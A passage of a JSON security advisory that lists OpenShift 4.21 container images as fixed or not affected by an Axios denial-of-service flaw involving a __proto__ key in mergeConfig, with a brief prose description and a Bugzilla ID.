"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5b379b10c95eb7a89203d552ee1c3437ce0afbe61fb0afbdff6f5f421962df5b_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:81cb7b7fa35e3474c1be5650beaf6f6e963ee2f739221d7226933e3aa6a3f226_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:313bd25c0339ea434c08a438eda7bd5e3323bf0e02934ee4d01eb31af658a07a_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:38ee956747c9e76adb8038bc81918a6fb8a800313a93cff8822d309466754b67_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:3d3258d77f4829041e29a9dea806a0041237646e65ad3c3007d7cd98ec15bfdc_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:da587c47cc75ef54935b580d8e40852523c707e52954bcccf0def9da3de88063_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:1a3732c862f54453a192ebf7727b2f0339909e2207b3ae809ffa321f14d1cc17_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:270d198ff926a597b38e25e78868bce6ffd76c9601ba71e56d6312f5a35e3d37_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:b45c8f4aa119aefaed6080c553d7414b4d25ddb0968147f1344c2a82671ad177_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:bcf37dd6a57b6d6ecbd834cf812adee2dc841b8bf1d08c21ea29a3c6aab4d405_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:5251c3ad369f33e07c6e24f482c562edce287bdae6b8e505ecb8d3cf09fc32be_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:7304e26ef6c8ab4d2c647cc2ba65af9a92fd0f1fead62da0c435d71b397aada8_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:c6abce790ae93c39059b7dbfef6899b2ec75ba1a9864509f6cce28b1d356407e_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:f39b80836b998e584dc235933e600ee12746a3bfb0079aea1476a1eecf8f446d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:399931f0229e6dd1c8da11cf570db838af5b8113d67e0071e8e7b1fdc59f735c_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:5df3c4493997002d40d9278e7ef6b90fb98905a2bba169b0410980d297bfade3_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:89b38bc6c2b4405d467684858b8a4f8980f6ad9d721e7ca75e9956f923639240_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:ab067ec0877565544332595cf9d023f4ad3479d940a8f3cb4f1eaf3f930d9e0f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:1659061e1d03edc348e920093f213b35e95512807ce7dd83b2f1bd0b012d7900_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:62075f81a8bc4ce5a7192023a80f2e27c2bc4fae547193776513d67fbddad601_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:750827c34059a77d8599b6171204bc17cf971c4b0e9470007f4db319df31c860_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:9324db9c450ee8a54926478918a4efa70943cbc29ae8e2e67f51fe60bfd75335_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:2d95f6a57074c1132b809a735cc09c4aaccbd08a2a689bc0ee87426f766733c3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:9b5c05ee9e7460a2a3fbf2539a4248581d4a69712a2be5601451019c52353cb2_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:b6809f3b2d4107dbb9e3338f63aa2f0646f19dd15a8980742e2aaa2e38d75362_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:c6e0d575be3fe6bab07ec95b244600e5eb6e8fcae5df1fd7b344381aae921c17_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:18f11df416a261b5f882d67f4de9a2dabbd8b80006ecabd033504d3b0fadb779_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:709239c59cc22bd41c553a7f30c147c4fb33ed6f560cba9ff976a966cc58dc3c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:af2f03bf9b66959ac4e8568bdf8ffe864faa8808bb6790b554b1c3d5d80ea112_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:bb8d6f977a5b10490657a0e713ce281ac0680bf68caf893c46fe9ca84093b4b1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:3d7c4d5a5809c712563175779356907b945010bf1357b78382ae405d89a8fd57_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:4b5f35cd93750652837275a4227ee08c40b2b7769ffdeec8a4d7a32ace69bbce_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:5aefedbf52b1d9b3ce8f6283e0716d4706b82fde65461a6924889ee507dfaa87_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:a90a60e27885e3ac1f74d00cb255478652da90af02a3771750b8598a53e9e48a_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:15cf0592b04ce9f19f286634c3a03001ef16f37d89f7752222b167ccbae4f583_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:3a8ab1634350c3e9f3768b56beb304696d71f996f980ff3839c79e6eb4af1ea0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:b40b75179bce35e2b49402bd6e345f234223f6379a845972122b9ebeb36ac40a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:37bffa4965d7ec59ecbfe8abf0a23d1e0411f9445c27237f9ca923cd1b96cb66_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:4d2f0e638d7c2632738ffdca9c391df061bbbb623f67138031590ef31cde06e6_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:549711d0027ee642c77126ff2cc280fef4ac6fa4b28605b9cbda4e34e3fcedfc_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:5ae6198359a92af6c4b317806ec8a33ff53d44189d14561a8f8a3153d7afdb81_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:c4d991da60458b7fd027719a7fe411bdfe82b192e7e882767dda61037e28aa3e_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:0932593cd3bb6cd2e2b9ecad5e3bbe2fdcd107785ab3f8b25596f4901d8ae33a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:33db1ea4989248c3760120da28f516110c25bec461090bed2b200505b3357470_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:57adf23fcec07626794be373afc7d776b9e384c23cfb53592cc1913b2b9bed00_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:7070ef2a6495712f2aa282baf40d7beabd5904b3256993681d573d83e172cbb6_arm64"
],
"known_not_affected": [
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:0670c2bb289901d477fbc283a5aea07cd38d7a7e19b16a9ac16f681bc94b2c62_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:81399846b57621b98c097a30f13e778d9842a8dc443ce62a37dad974b1f7f439_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a4de71b4f22f9f5f46300ff38cfda0e4b5647f286fd5bd365d9e0a6cadd94d5d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:ac86e849e17e9a83d6683ed0469538f758a53aec6fbe89df675c66ef66f007e6_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:2ecec54cb74d1a34486e71b455886ca4a88ee3b4f3e21fba7d7e3d17b00179fc_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5c538e8d7cb551cac0459c1971e8bf9800d1db3eaf7e66639ebaeb6c3d9305bb_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:ad92acc19589b0305162857f2a14d8174fc4cb90d5ffc09991f49de756ae61c7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:edcabf99710bd0952e329b0edab7b7a86b93f9d34dfe17d3391c9405210f63dd_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:48d9d26f06bc34472304b35f6559e428bd1d599267d1298ccf2b199533af4749_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:52e53301f201de393f91cf3084e814e35fe6f93f0432969fd4c511c2ac51b911_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:7ed4a15043060bc2f6ed0ce98efca2721fe19efd8705ecc23ec410de836b6ac6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:b39b3e7a8be95fb0190842c892edaac58878ef2a3c0e59a59365504aef68c101_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1571d23b7a60a14ca1f6942daa5a4681fec9f1fbdfcece0bc76d552ab96dc45a_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:6427f32947afaea5139673b7561ed3ea36b6d0a9272388146c96636a461d7e4b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:cf354f87320a3b730ade16800a31fd18edd643aa6b652d0249f6f531db8932ad_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dd52af230c401d3e17f80ed764ffc2d176c4f1278fd8be791d8098094acbbfa0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2131f098ee848c2a4190c1fea7410df1e465efd7bec4e62b36df7cfce07872ac_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2fb1acc8f1c8f4091671c53c1e2944c91a123a386233ae093def99b6ef6963a2_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:3c497ebfc92e76d91bdb7d81f44d42d245a87c85ca8752f933a89121e372fcf9_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:6032a0dbc7f698d3519118fb73fa99395d08be3c022231a293ba265442c31371_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:47c2783399e696c5e9c87ba45a653580d79f0ff9da2452c6bddc78c504a593be_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:6d6bbab810dd6cf82997f98c6eb27474c2f28ee6139d254e163045ae881ebca3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:ba9149621bc099a23abdf277f9dd9e1577d3e758fbcfeba8a85b4aba674822c4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:f607a04fbff99b8e9fe049182f651c9be0492e6534013aff0743dd5a24954051_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:874f7948285d470527af2f674fc82981f2c2b375ab056e06710d4b63f467db08_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c61aadb6f4c72f47bae25eb36b2b392432b9d1c52c25deb6c168689696092d4d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:d6abeb46b250118c1bc6d79a205fb2a28f1e2c87cc1782856e2b08d57726a242_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:f4dc5a0f19fd2ce83023001e4b8bd3f06d0f551187a8da64e3882783190a48f4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:a9600a1e30aff273ea62fac0e0b765c5aa74f41c3a770740fe7a6bd104d845c0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:c86603a6876ffc9fda19897fae53ce46f5ed1ec490e30c684a224c453146d9f7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:db4ea6f06a95e645bdc99ba1e80ce72119a0333c222c8565139a4481715e943a_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:f54a077136b77f7b7f4158ebe48dd8c327ed24f31d1f60bb74e377289c8f388d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:2b28ccc2527b7ee1d7d5eb702ce0cbda80f65f2b70380dcd461b078e85acdb4d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:344986bd16bbbd9fafe104e63c43c8049dec8a4851db413a807e8ae947a6d13c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:431d1f322a4f0234798ba728670ada359bc7671ce4f297907c0c8fcef3f0a881_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:6910c5b5446ae3efd828d830d67e07d64fcd15d03b188c54bcf222c0d9f1f074_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:3ee9539604dee7477d19a5769831e053bfa7b1e5611763a7eadad34bda111015_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:55ba05713a6b9e8a0cde50390e1935ae37f8f8dc8c98c7ee926a69c02605c7fe_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:79fa1f3a57e1db94048a410727dd6bacd4683e1a54bf699d3dd318a84a9ed45b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:b4fd7ff14b54766e058b847d7f91c13dc17bf661e45c07bca5bc9754d20e14ae_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:6c229d2b0ac3ea07cc7703cb778ee27a59b975a194041efa8cb3eea86a48652e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:846447487434a57df9b33f06fb5704fcc96ffa518baf6d99223c4e1795e5c643_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:9650cffbe1a64468fef27a62a960b67059d0d6ed59e2ef09c7900d29133c0864_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:a3972c8b0f417fadf45f1cc1a14543f02586b364171b8e60e7bcb90c98623dd0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:37c8160b545194fe3a91940a9fc8911383fd3674dcbc3135454b6872b04d7c42_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:962110a1c424f7893ae4cf2b7bc6a57a8c0070cbc699029fb0c7503217065dfb_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:e6ea068305ca712061e83e4352b3fa9c2431dca533473928fa3c87ad1dc45a01_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f247b47505e0947c5a733c938a17a899af2faa5f3f0ae29b17ba0a0e30f99235_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:934795c45d33ed58aa148aca6a165a4f38ec9ce88413ed62404da19627e4c465_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:a1a7aff47d11acf486bb1e83bcb6aaffe8bc50dd4c655150708ede4cb9359c6d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:b45ff6b59330f93a7e91e911cb12a3676301613d69b500f139f0c414281bfa84_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e0b7b9cb40746ca2b38791ca125dae22dff7f6afadce2c31c7299c69dc316fac_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:002057809ba8771cebee023519dbfb91a5b4f5102a292695a7d6746e93faaeaf_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:146c6b876b93819d9f783515ad0214f1d0609905d5b0239c1d1c377a8a77f53f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:68fbb392a2e08a7c32f0bcfa78b1e4aacb67df3cae696160d7946013d97d54b7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:b576d483f631013f1beda76d250a739cf9680f8dcf53b4f0146e7998d6c9f0dd_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:20544c6de0614e3e195c9f45aea764132229c619228fa4483f7e418297b96ff6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:7c4b7e341a617380ab6f0dd9a1012fdfe9908afd744a2c81cae644538f881602_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:e4c9cd54f5209f2b1d5b53ded3d40292253c74f8ae3d4db626756ddbc6e11c60_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:f3eaf72bb86601787b4b2f26801528061ac5759c3ff7dc1caabb33a43ff556c5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:32532889f9a19086cc0567dd0375f43e303cb46cc646d8ff896d3599e7fa3cff_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:660e0c3c9ce138815279455fc77017a85398ee6130f0ed5d73c780ba454c6a90_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:7cd0406733f1313f3ec2011e8bce76ab83b044a75e5025fd8913796f03ad9356_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:8c41cf0e7e426f5092ac57f893c807b846a5737aa27882068ec6a982758aa8f1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:3f53284ee9720572b864ab12a87dfb98736e26dfd34e87f3967ec4800bc06b62_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45905152fdf546d05fe323898009781331f8665bb32fe7d91d2fad384ec8732e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45c1bb0d34fbf71bbd0caa65dc531e67575f34d7322e8d5313583aae4e0e2eab_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:f244e67bad477b8d5c57b74804a06fbd7d9403ae3d475ac2af71d927c6f888bd_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:0d786d1acd2b6102b55179f28ea29579c9f95593888305a12ff8574adec158d6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:6f0132e14e165e5d59ab20bb4e869d068aa8954e5aeae47c29cb84cc370b2b0a_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:af02bf26ff1d9ffc8db66969f140e90d3318b894f63931b47818143ab1e99ff2_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:fa8c6beaf4228a8f690b70daef15fdde242c3d196e783deaaf4d3769db488d74_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:22f01a38260fffda38bb27bd7b1d5d1af9018f7269fe989778a94046f0b58ade_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:480b04a55b7b86e80cc79c6695ab39b68a9714588eaa2d2c7264481541015651_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:c4d2014bca6fbda58a4797f0f2d5732efc3692a609899ba8ca063afd1103fd77_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:caf64d624cc8e698f0d6cbd583ea3d43b64e46da125b6608dfe4072915d68f43_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:229041be25597926b6cba147a685e9025f1fd38aaccd3ada69f6f08a36a1c3d5_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:41cfbaf6fa7e1c4e9d9ab2bbfaed39024c445e6d9437745ee69ff6b9f1ea73b0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:73502251685a4ceb38593092b7b9678630d7266496bf860ec2abe6bb77afcea0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:fc6d0b64e7e5ccfdec2fa08bab5b2a0d598d2afe6272b593656d8b3c7d9aa725_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-ui-rhel9@sha256:9490248af37278e0b107eef719bea4e4b14e2840f42d5d31c0a546efb9a16ab8_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:2e1a0d68274399049a694f58a73c92fcba077c59f50c20da896451b7724f1ebf_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:49dbeb17cd5787537cb5e30dd5d2c7adcf720346613c28004d292a5a554a4fa7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:524c4410d51b126c6097fae3b2ad88ec67900e7b786a9131b7a8e96a194e4847_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:f5cdce5e8eee1b014ff8a0a12181a3d05d5dbb747e8e4114c18d7c891e97a477_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:7662f86e2f8f23582ae548c70dad5458e37256f9c4cdc401be880e319ef591c2_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:cb234cf1c44de4b0b0713b2792e06e115830b115d540b494baccad28139b4fd2_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:7f0514302066e0f199e33be56fe074f7666e223169df5f71b06e06779bdb6e8b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:df3552170db05d67f4e75e756495f62164a28bd7468f4093e43f3a7c13bf7682_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:9c8cebfcb7f84844bb476441b61c60a3c88fc562406c84689958b517282966d3_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:c7609e999d1c88e83dd99682b5756386c274d506704340d78be73efe9e6f35b1_arm64",
